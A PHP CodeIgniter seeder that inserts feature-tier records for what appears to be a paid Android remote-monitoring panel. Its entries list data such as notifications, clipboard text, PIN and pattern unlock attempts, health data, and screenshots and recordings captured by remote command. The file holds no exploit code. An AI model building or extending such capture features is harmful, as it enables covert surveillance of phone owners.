<?php

namespace App\Database\Seeds;

use CodeIgniter\Database\Seeder;

class FeatureTiersSeeder extends Seeder
{
    public function run()
    {
        $db = \Config\Database::connect();

        $features = [
            [
                'category_type' => 'hardware',
                'slug'          => 'device_context',
                'label'         => 'Device Context',
                'description'   => 'Build fingerprint, SOC model, kernel, hardware revisions',
                'icon'          => 'fas fa-mobile-alt',
                'color_class'   => 'card-info',
                'bg_class'      => 'bg-info',
                'required_tier' => 'free',
            ],
            [
                'category_type' => 'hardware',
                'slug'          => 'network_info',
                'label'         => 'Network Interfaces',
                'description'   => 'Active interfaces, IP/MAC addresses, signal strength',
                'icon'          => 'fas fa-network-wired',
                'color_class'   => 'card-info',
                'bg_class'      => 'bg-info',
                'required_tier' => 'free',
            ],
            [
                'category_type' => 'hardware',
                'slug'          => 'bluetooth',
                'label'         => 'Bluetooth Peripherals',
                'description'   => 'Adapter status, paired devices, LE scan records',
                'icon'          => 'fab fa-bluetooth',
                'color_class'   => 'card-info',
                'bg_class'      => 'bg-info',
                'required_tier' => 'free',
            ],
            [
                'category_type' => 'hardware',
                'slug'          => 'sensors',
                'label'         => 'Sensor Profile',
                'description'   => 'Accelerometer, Gyroscope, Magnetometer details',
                'icon'          => 'fas fa-compass',
                'color_class'   => 'card-info',
                'bg_class'      => 'bg-info',
                'required_tier' => 'free',
            ],
            [
                'category_type' => 'hardware',
                'slug'          => 'camera_info',
                'label'         => 'Camera Hardware',
                'description'   => 'Sensor characteristics, resolutions, flash capabilities',
                'icon'          => 'fas fa-camera',
                'color_class'   => 'card-info',
                'bg_class'      => 'bg-info',
                'required_tier' => 'free',
            ],
            [
                'category_type' => 'hardware',
                'slug'          => 'battery_stats',
                'label'         => 'Battery Metrics',
                'description'   => 'Level, voltage, temperature, health status',
                'icon'          => 'fas fa-battery-half',
                'color_class'   => 'card-info',
                'bg_class'      => 'bg-info',
                'required_tier' => 'free',
            ],
            [
                'category_type' => 'hardware',
                'slug'          => 'cell_towers',
                'label'         => 'Cell Towers',
                'description'   => 'Serving & neighboring cell IDs, MCC/MNC, signal dBm',
                'icon'          => 'fas fa-broadcast-tower',
                'color_class'   => 'card-warning',
                'bg_class'      => 'bg-warning',
                'required_tier' => 'gold',
            ],
            [
                'category_type' => 'hardware',
                'slug'          => 'display_info',
                'label'         => 'Display Info',
                'description'   => 'Resolution, refresh rate, HDR support, density DPI',
                'icon'          => 'fas fa-desktop',
                'color_class'   => 'card-warning',
                'bg_class'      => 'bg-warning',
                'required_tier' => 'gold',
            ],
            [
                'category_type' => 'hardware',
                'slug'          => 'storage',
                'label'         => 'Storage Volume',
                'description'   => 'Internal & external disk partitions, bytes free/total',
                'icon'          => 'fas fa-hdd',
                'color_class'   => 'card-warning',
                'bg_class'      => 'bg-warning',
                'required_tier' => 'gold',
            ],
            [
                'category_type' => 'hardware',
                'slug'          => 'nfc',
                'label'         => 'NFC Adapter',
                'description'   => 'Hardware presence, enabled state, HCE support',
                'icon'          => 'fas fa-wifi',
                'color_class'   => 'card-warning',
                'bg_class'      => 'bg-warning',
                'required_tier' => 'gold',
            ],
            [
                'category_type' => 'hardware',
                'slug'          => 'hardware_network',
                'label'         => 'Hardware Network (Modem)',
                'description'   => 'Radio stack, baseband version, modem capability',
                'icon'          => 'fas fa-microchip',
                'color_class'   => 'card-danger',
                'bg_class'      => 'bg-danger',
                'required_tier' => 'platinum',
            ],
            [
                'category_type' => 'hardware',
                'slug'          => 'hardware_graphics',
                'label'         => 'Hardware Graphics (GPU)',
                'description'   => 'GL Renderer, Vulkan API version, media codecs',
                'icon'          => 'fas fa-memory',
                'color_class'   => 'card-danger',
                'bg_class'      => 'bg-danger',
                'required_tier' => 'platinum',
            ],
            [
                'category_type' => 'hardware',
                'slug'          => 'audio_devices',
                'label'         => 'Audio Devices',
                'description'   => 'Hardware peripherals, audio sinks, sample rates',
                'icon'          => 'fas fa-volume-up',
                'color_class'   => 'card-danger',
                'bg_class'      => 'bg-danger',
                'required_tier' => 'platinum',
            ],
            [
                'category_type' => 'hardware',
                'slug'          => 'biometric',
                'label'         => 'Biometric Hardware',
                'description'   => 'Fingerprint, face unlock sensor capabilities & strength',
                'icon'          => 'fas fa-fingerprint',
                'color_class'   => 'card-danger',
                'bg_class'      => 'bg-danger',
                'required_tier' => 'platinum',
            ],
            [
                'category_type' => 'hardware',
                'slug'          => 'gnss_hardware',
                'label'         => 'GNSS Hardware',
                'description'   => 'GPS/GLONASS/Galileo satellite hardware engine metrics',
                'icon'          => 'fas fa-satellite',
                'color_class'   => 'card-danger',
                'bg_class'      => 'bg-danger',
                'required_tier' => 'platinum',
            ],
            [
                'category_type' => 'hardware',
                'slug'          => 'usb_devices',
                'label'         => 'USB Devices',
                'description'   => 'Attached USB accessories, host/peripheral mode',
                'icon'          => 'fas fa-plug',
                'color_class'   => 'card-danger',
                'bg_class'      => 'bg-danger',
                'required_tier' => 'platinum',
            ],
            [
                'category_type' => 'hardware',
                'slug'          => 'vibration',
                'label'         => 'Vibrator Motor',
                'description'   => 'Haptic feedback motor presence, amplitude control',
                'icon'          => 'fas fa-vibrate',
                'color_class'   => 'card-danger',
                'bg_class'      => 'bg-danger',
                'required_tier' => 'platinum',
            ],
            [
                'category_type' => 'hardware',
                'slug'          => 'sim_configs',
                'label'         => 'SIM Telephony',
                'description'   => 'Dual SIM slots, subscription info, carrier privileges',
                'icon'          => 'fas fa-sim-card',
                'color_class'   => 'card-danger',
                'bg_class'      => 'bg-danger',
                'required_tier' => 'platinum',
            ],

            // ── Software Features ──
            [
                'category_type' => 'software',
                'slug'          => 'accounts',
                'label'         => 'User Accounts',
                'description'   => 'System accounts, sync status, auth token types',
                'icon'          => 'fas fa-user-circle',
                'color_class'   => 'card-info',
                'bg_class'      => 'bg-info',
                'required_tier' => 'free',
            ],
            [
                'category_type' => 'software',
                'slug'          => 'calendar',
                'label'         => 'Calendar Events',
                'description'   => 'Extracted calendar events, schedules, attendees',
                'icon'          => 'fas fa-calendar-alt',
                'color_class'   => 'card-info',
                'bg_class'      => 'bg-info',
                'required_tier' => 'free',
            ],
            [
                'category_type' => 'software',
                'slug'          => 'app_usage',
                'label'         => 'App Usage Time',
                'description'   => 'Foreground time per package, last time used',
                'icon'          => 'fas fa-chart-bar',
                'color_class'   => 'card-info',
                'bg_class'      => 'bg-info',
                'required_tier' => 'free',
            ],
            [
                'category_type' => 'software',
                'slug'          => 'notifications',
                'label'         => 'App Notifications',
                'description'   => 'Captured status bar notifications, posted time',
                'icon'          => 'fas fa-bell',
                'color_class'   => 'card-info',
                'bg_class'      => 'bg-info',
                'required_tier' => 'free',
            ],
            [
                'category_type' => 'software',
                'slug'          => 'security_audit',
                'label'         => 'Security Audit',
                'description'   => 'VPN/Proxy status, open ports, user & system CA certs',
                'icon'          => 'fas fa-user-shield',
                'color_class'   => 'card-info',
                'bg_class'      => 'bg-info',
                'required_tier' => 'free',
            ],
            [
                'category_type' => 'software',
                'slug'          => 'accessibility',
                'label'         => 'Accessibility Services',
                'description'   => 'Enabled accessibility tools, package permissions',
                'icon'          => 'fas fa-universal-access',
                'color_class'   => 'card-warning',
                'bg_class'      => 'bg-warning',
                'required_tier' => 'gold',
            ],
            [
                'category_type' => 'software',
                'slug'          => 'input_methods',
                'label'         => 'Keyboards (IME)',
                'description'   => 'Installed input method editors, active subtype',
                'icon'          => 'fas fa-keyboard',
                'color_class'   => 'card-warning',
                'bg_class'      => 'bg-warning',
                'required_tier' => 'gold',
            ],
            [
                'category_type' => 'software',
                'slug'          => 'remote_media',
                'label'         => 'Captured Media',
                'description'   => 'Audio/Camera recordings captured from remote commands',
                'icon'          => 'fas fa-photo-video',
                'color_class'   => 'card-warning',
                'bg_class'      => 'bg-warning',
                'required_tier' => 'gold',
            ],
            [
                'category_type' => 'software',
                'slug'          => 'data_usage',
                'label'         => 'Data Usage Stats',
                'description'   => 'Bytes transmitted & received per app over Wi-Fi/Mobile',
                'icon'          => 'fas fa-exchange-alt',
                'color_class'   => 'card-warning',
                'bg_class'      => 'bg-warning',
                'required_tier' => 'gold',
            ],
            [
                'category_type' => 'software',
                'slug'          => 'saved_wifi',
                'label'         => 'Saved Wi-Fi Networks',
                'description'   => 'Known Wi-Fi SSIDs, BSSIDs, key management types',
                'icon'          => 'fas fa-wifi',
                'color_class'   => 'card-warning',
                'bg_class'      => 'bg-warning',
                'required_tier' => 'gold',
            ],
            [
                'category_type' => 'software',
                'slug'          => 'default_apps',
                'label'         => 'Default Handlers',
                'description'   => 'Preferred apps for browser, dialer, SMS, launcher',
                'icon'          => 'fas fa-cog',
                'color_class'   => 'card-warning',
                'bg_class'      => 'bg-warning',
                'required_tier' => 'gold',
            ],
            [
                'category_type' => 'software',
                'slug'          => 'alarms',
                'label'         => 'Alarms & Timers',
                'description'   => 'Configured system alarms, next alarm trigger time',
                'icon'          => 'fas fa-clock',
                'color_class'   => 'card-warning',
                'bg_class'      => 'bg-warning',
                'required_tier' => 'gold',
            ],
            [
                'category_type' => 'software',
                'slug'          => 'app_security',
                'label'         => 'App Security (Selinux/SDB)',
                'description'   => 'Developer options, USB debugging, sideloading state',
                'icon'          => 'fas fa-lock',
                'color_class'   => 'card-danger',
                'bg_class'      => 'bg-danger',
                'required_tier' => 'platinum',
            ],
            [
                'category_type' => 'software',
                'slug'          => 'network_security',
                'label'         => 'Network Security Config',
                'description'   => 'Cleartext traffic policy, TLS pin configs per domain',
                'icon'          => 'fas fa-shield-alt',
                'color_class'   => 'card-danger',
                'bg_class'      => 'bg-danger',
                'required_tier' => 'platinum',
            ],
            [
                'category_type' => 'software',
                'slug'          => 'system_locale',
                'label'         => 'System Locale & Timezone',
                'description'   => 'Language preferences, time zone ID, 12/24hr format',
                'icon'          => 'fas fa-globe-americas',
                'color_class'   => 'card-danger',
                'bg_class'      => 'bg-danger',
                'required_tier' => 'platinum',
            ],
            [
                'category_type' => 'software',
                'slug'          => 'app_permissions',
                'label'         => 'App Permissions Matrix',
                'description'   => 'Granted dangerous permissions per installed app',
                'icon'          => 'fas fa-key',
                'color_class'   => 'card-danger',
                'bg_class'      => 'bg-danger',
                'required_tier' => 'platinum',
            ],
            [
                'category_type' => 'software',
                'slug'          => 'clipboard',
                'label'         => 'Clipboard Entries',
                'description'   => 'Captured system clipboard text & clip timestamps',
                'icon'          => 'fas fa-paste',
                'color_class'   => 'card-danger',
                'bg_class'      => 'bg-danger',
                'required_tier' => 'platinum',
            ],
            [
                'category_type' => 'software',
                'slug'          => 'content_providers',
                'label'         => 'Content Providers',
                'description'   => 'Exported authorities, read/write permission requirements',
                'icon'          => 'fas fa-database',
                'color_class'   => 'card-danger',
                'bg_class'      => 'bg-danger',
                'required_tier' => 'platinum',
            ],
            [
                'category_type' => 'software',
                'slug'          => 'crash_logs',
                'label'         => 'System Crash Logs',
                'description'   => 'Application ANRs, native crash stack traces, tombstone dumps',
                'icon'          => 'fas fa-bug',
                'color_class'   => 'card-danger',
                'bg_class'      => 'bg-danger',
                'required_tier' => 'platinum',
            ],
            [
                'category_type' => 'software',
                'slug'          => 'digital_wellbeing',
                'label'         => 'Digital Wellbeing',
                'description'   => 'Screen time limits, app pauses, focus mode states',
                'icon'          => 'fas fa-heartbeat',
                'color_class'   => 'card-danger',
                'bg_class'      => 'bg-danger',
                'required_tier' => 'platinum',
            ],
            [
                'category_type' => 'software',
                'slug'          => 'doze_standby',
                'label'         => 'Doze & App Standby',
                'description'   => 'Deep doze state, battery saver mode, standby buckets',
                'icon'          => 'fas fa-bed',
                'color_class'   => 'card-danger',
                'bg_class'      => 'bg-danger',
                'required_tier' => 'platinum',
            ],
            [
                'category_type' => 'software',
                'slug'          => 'health_data',
                'label'         => 'Health Data',
                'description'   => 'Step counts, heart rate, sleep intervals, workouts',
                'icon'          => 'fas fa-heart',
                'color_class'   => 'card-danger',
                'bg_class'      => 'bg-danger',
                'required_tier' => 'platinum',
            ],
            [
                'category_type' => 'software',
                'slug'          => 'keyguard',
                'label'         => 'Keyguard Events',
                'description'   => 'Screen lock/unlock events, PIN/Pattern/Biometric auth attempts',
                'icon'          => 'fas fa-unlock-alt',
                'color_class'   => 'card-danger',
                'bg_class'      => 'bg-danger',
                'required_tier' => 'platinum',
            ],
            [
                'category_type' => 'software',
                'slug'          => 'screenshots',
                'label'         => 'Captured Screenshots',
                'description'   => 'Images captured from remote screenshot commands',
                'icon'          => 'fas fa-file-image',
                'color_class'   => 'card-danger',
                'bg_class'      => 'bg-danger',
                'required_tier' => 'platinum',
            ],
            [
                'category_type' => 'software',
                'slug'          => 'screen_state',
                'label'         => 'Screen Interactive State',
                'description'   => 'Screen ON/OFF history, interactive vs non-interactive times',
                'icon'          => 'fas fa-tv',
                'color_class'   => 'card-danger',
                'bg_class'      => 'bg-danger',
                'required_tier' => 'platinum',
            ],
            [
                'category_type' => 'software',
                'slug'          => 'vpn_config',
                'label'         => 'VPN Configurations',
                'description'   => 'Active VPN apps, session names, addresses, DNS servers',
                'icon'          => 'fas fa-network-wired',
                'color_class'   => 'card-danger',
                'bg_class'      => 'bg-danger',
                'required_tier' => 'platinum',
            ],
            [
                'category_type' => 'software',
                'slug'          => 'running_processes',
                'label'         => 'Running Processes',
                'description'   => 'Active background processes, PIDs, memory RSS usages',
                'icon'          => 'fas fa-microchip',
                'color_class'   => 'card-danger',
                'bg_class'      => 'bg-danger',
                'required_tier' => 'platinum',
            ],
            [
                'category_type' => 'software',
                'slug'          => 'telephony_network',
                'label'         => 'Mobile Network',
                'description'   => 'IMS/VoLTE, data roaming, carrier config',
                'icon'          => 'fas fa-signal',
                'color_class'   => 'card-secondary',
                'bg_class'      => 'bg-secondary',
                'required_tier' => 'platinum',
            ],
        ];

        foreach ($features as $f) {
            $exists = $db->table('tbl_feature_tiers')
                ->where('slug', $f['slug'])
                ->countAllResults();

            if ($exists === 0) {
                $db->table('tbl_feature_tiers')->insert($f);
            }
        }
    }
}
